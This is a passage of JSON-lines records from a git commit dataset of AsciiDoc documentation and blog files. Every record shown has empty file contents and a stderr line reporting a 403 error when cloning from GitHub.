queens\n","repos":"bibryam\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2014-05-12-CheatingOnTheNQueensBenchmark.adoc","new_file":"blog\/2014-05-12-CheatingOnTheNQueensBenchmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ee1aaa84d0bc1634d29816486c129d6b013dd5c","subject":"Update 2001-01-01-tron-dance.adoc","message":"Update 2001-01-01-tron-dance.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2001-01-01-tron-dance.adoc","new_file":"_posts\/2001-01-01-tron-dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f786577cfdfb62717f32e33885a9ca0530ceea56","subject":"updating to latest Docker CE","message":"updating to latest Docker CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"71cac1010e0afbb728f64b567f026e563ee35ff9","subject":"update API doc","message":"update API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"eb617fee2e6e4b4f6cd15a1486f9a65eb8d8a6db","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36d8e4d041e496db1ab7f70e0765a2045509f4de","subject":"Update 2016-08-29-Hello-World.adoc","message":"Update 2016-08-29-Hello-World.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-29-Hello-World.adoc","new_file":"_posts\/2016-08-29-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf75bc3fe776f16fa86caec9019f0f8d5f2884b","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"572a78e53ecf11fb3bf2261cb3e52137c2eb8c94","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb46416f60bf64475d0213083a6ed98e65d2991f","subject":"Added a README","message":"Added a README\n","repos":"feedhenry-raincatcher\/raincatcher-demo-portal,feedhenry-raincatcher\/raincatcher-demo-portal,feedhenry-raincatcher\/raincatcher-demo-cloud","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry-raincatcher\/raincatcher-demo-cloud.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43259540ef555c31d4b0d2ecb3207742a78fa425","subject":"Changed README","message":"Changed README\n","repos":"pschalk\/camunda-bpm-custom-batch","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pschalk\/camunda-bpm-custom-batch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9030532cac510476e5c7080ba4bd339fe664b1c1","subject":"Now hosted on GitLab","message":"Now hosted on GitLab\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"830ca4f9705394cb2fe11b4d787febb36ede305d","subject":"update README to Asciidoctor 1.5.0-compatible syntax","message":"update README to Asciidoctor 1.5.0-compatible syntax\n","repos":"asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c5bbde47021d4c88d12c34e8395ec54d4d39f99","subject":"add dutch clojure day 2020","message":"add dutch clojure day 2020\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/dutchclojureday.adoc","new_file":"content\/events\/2020\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ba70af5dfec9643a876ebaa6a95835f63f5a4723","subject":"Update 2015-10-29-first-testing.adoc","message":"Update 2015-10-29-first-testing.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-10-29-first-testing.adoc","new_file":"_posts\/2015-10-29-first-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755f6e8b32d219bd4b86d09fd480395d65723b92","subject":"Update 2016-05-21-Test-Math-Jax.adoc","message":"Update 2016-05-21-Test-Math-Jax.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-21-Test-Math-Jax.adoc","new_file":"_posts\/2016-05-21-Test-Math-Jax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80c5aa31591e9a42797fb9a333a58c43fdfd78f6","subject":"_posts\/2016-07-06-Quadruplexes2.adoc","message":"_posts\/2016-07-06-Quadruplexes2.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-06-Quadruplexes2.adoc","new_file":"_posts\/2016-07-06-Quadruplexes2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852fc9cf8924a0d042e58b76377c5228d2e2cc40","subject":"Update 2017-02-14-Stuff-test.adoc","message":"Update 2017-02-14-Stuff-test.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Stuff-test.adoc","new_file":"_posts\/2017-02-14-Stuff-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"699db6a98460a0d6c7360963549efb35fcc60b53","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e21a5569db5b45971128b4dbc6b2f598fc3cf7c1","subject":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","message":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23410972db4c473facf738a0234c07830ba288d7","subject":"doc:v2.36 release notes","message":"doc:v2.36 release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e92ea047c2d04d5ed58657ee7475a8e1b5644906","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab99deeaf017d002dd5619e352ac77558a91e6fd","subject":"starting to build structure for fabric8 docs","message":"starting to build structure for fabric8 docs\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-kubernetes-fabric8.adoc","new_file":"chapters\/docker-kubernetes-fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52df00a6a1ef5d1f91b8c2c373eff7727df32b8b","subject":"Add hidden transformer module doc.","message":"Add hidden transformer module doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/hidden_transformer.adoc","new_file":"doc\/dev\/modules\/hidden_transformer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"737338b6456d77e58541f098c2afe490a2cf6680","subject":"Moved Security docs to repo","message":"Moved Security docs to repo\n","repos":"cunningt\/camel,apache\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,kevinearls\/camel,objectiser\/camel,objectiser\/camel,Fabryprog\/camel,cunningt\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,adessaigne\/camel,Fabryprog\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,CodeSmell\/camel,alvinkwekel\/camel,nicolaferraro\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,ullgren\/camel,alvinkwekel\/camel,alvinkwekel\/camel,objectiser\/camel,zregvart\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,gnodet\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,nicolaferraro\/camel,zregvart\/camel,pmoerenhout\/camel,CodeSmell\/camel,onders86\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,gnodet\/camel,kevinearls\/camel,davidkarlsen\/camel,apache\/camel,kevinearls\/camel,apache\/camel,tdiesler\/camel,gnodet\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,ullgren\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,kevinearls\/camel,pax95\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,christophd\/camel,alvinkwekel\/camel,tdiesler\/camel,onders86\/camel,tadayosi\/camel,mcollovati\/camel,mcollovati\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,Fabryprog\/camel,nikhilvibhav\/camel,kevinearls\/camel,nicolaferraro\/camel,onders86\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/en\/security.adoc","new_file":"docs\/user-manual\/en\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8027113a3688b3abc2317ad75fcc41e292e349a6","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d81865f95ecd7429cce42f75b64312ede35ad4c4","subject":"Remove `TODO.adoc` as unused","message":"Remove `TODO.adoc` as unused\n","repos":"spodin\/algorithms","old_file":"TODO.adoc","new_file":"TODO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06638a0822f904c01c4968809d4d9e261f1eb863","subject":"Reorganize some sections and add empty sections.","message":"Reorganize some sections and add empty sections.\n","repos":"yurrriq\/cats,OlegTheCat\/cats,tcsavage\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f344d553fe387f025e8d2de889ce4eb585fb6555","subject":"Bugfix in documentation: incorrect path to resource in example","message":"Bugfix in documentation: incorrect path to resource in example\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c33f68c8b4c8d42f047fc249db62a724032e55d","subject":"Created doc for developing Forge addons","message":"Created doc for developing Forge addons\n\nCopied from the Forge Core README.\n","repos":"forge\/docs,luiz158\/docs,agoncal\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,addonis1990\/docs","old_file":"get_started\/Develop-your-addon.asciidoc","new_file":"get_started\/Develop-your-addon.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ca8a2450a0683ff339356769b0d1f7124ec18ae8","subject":"y2b create post Cinnamon Bun Potato Chips?","message":"y2b create post Cinnamon Bun Potato Chips?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-20-Cinnamon-Bun-Potato-Chips.adoc","new_file":"_posts\/2014-08-20-Cinnamon-Bun-Potato-Chips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c73e4de0e0344aff7861e6c3e91903abf5cc1d22","subject":"fdroid: initial notes","message":"fdroid: initial notes\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"fdroid\/NOTES.adoc","new_file":"fdroid\/NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c58e95a19ac4c106748968069f6a1e5a7f441a58","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62c8efdfb443bd707bf26bd6a2d65e33fab955df","subject":"y2b create post This 3D Audio Experience Will Blow Your Mind (Wear Headphones)","message":"y2b create post This 3D Audio Experience Will Blow Your Mind (Wear Headphones)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-19-This-3D-Audio-Experience-Will-Blow-Your-Mind-Wear-Headphones.adoc","new_file":"_posts\/2017-11-19-This-3D-Audio-Experience-Will-Blow-Your-Mind-Wear-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52c471787fa35bd746e1b5af7550637bab48bb75","subject":"Added documentation for the binary-serializer pipeline step.","message":"Added documentation for the binary-serializer pipeline step.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e008e87c47c6bb9ce209e7bd49c919b1a93c258","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-gateway,spring-cloud-incubator\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spencergibb\/spring-cloud-gateway.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16a8d5245f025dbfbc27c182ba932d5b6ea516b5","subject":"Reflect cross-cluster search in \"dedicated\" terminology (#23771)","message":"Reflect cross-cluster search in \"dedicated\" terminology (#23771)\n\n* Reflects cross-cluster search in dedicated node settings\r\n\r\n* Fix space issue\r\n","repos":"wangtuo\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,nazarewk\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,shreejay\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,gfyoung\/elasticsearch,glefloch\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jprante\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,gingerwizard\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,glefloch\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1319f4f138ad41695f1ec44b946f3170097b2513","subject":"Update 2017-09-22-aa.adoc","message":"Update 